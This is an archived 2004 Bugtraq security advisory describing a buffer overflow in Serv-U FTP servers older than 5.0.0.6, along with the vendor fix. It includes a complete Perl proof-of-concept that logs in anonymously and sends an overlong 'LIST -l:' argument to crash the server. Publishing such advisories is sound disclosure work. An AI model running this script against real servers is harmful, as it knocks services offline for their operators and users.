lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 3 May 2004 14:39:55 +0300 From: Aviram Jenik <aviram@...ondsecurity.com> To: bugtraq@...urityfocus.com Subject: Serv-U LIST -l Parameter Buffer Overflow Serv-U LIST -l Parameter Buffer Overflow ------------------------------------------------------------------------ Article reference: http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html SUMMARY <http://www.serv-u.com/> Serv-U is a "powerful, easy-to-use, award-winning FTP server" created by Rob Beckers. A vulnerability in the product allows a remote user to cause the server to fail by sending a malformed LIST command to the server. DETAILS Vulnerable Systems: * Serv-U older than 5.0.0.6 Immune Systems: * Serv-U 5.0.0.6 and newer A user issuing a long parameter (around 134 bytes) as a value for a LIST command (using the -l: parameter for that LIST command), can cause the server to try and read a value that is outside the memory location of the Serv-U's memory, this will cause an exception to be triggered (an unhandled exception), which in turn causes the program to crash. Solution: The vendor has released a new version, which fixes this problem. Exploit: #!/usr/bin/perl use IO::Socket; $host = "192.168.1.243"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2116", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = join("", "PASS ", "a\@b.com", "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/230 /) { last; } } my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/250 Done/) { last; } } close $remote; ADDITIONAL INFORMATION SecurITeam would like to thank <mailto:storm@...uriteam.com> STORM for finding this vulnerability. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Powered by blists - more mailing lists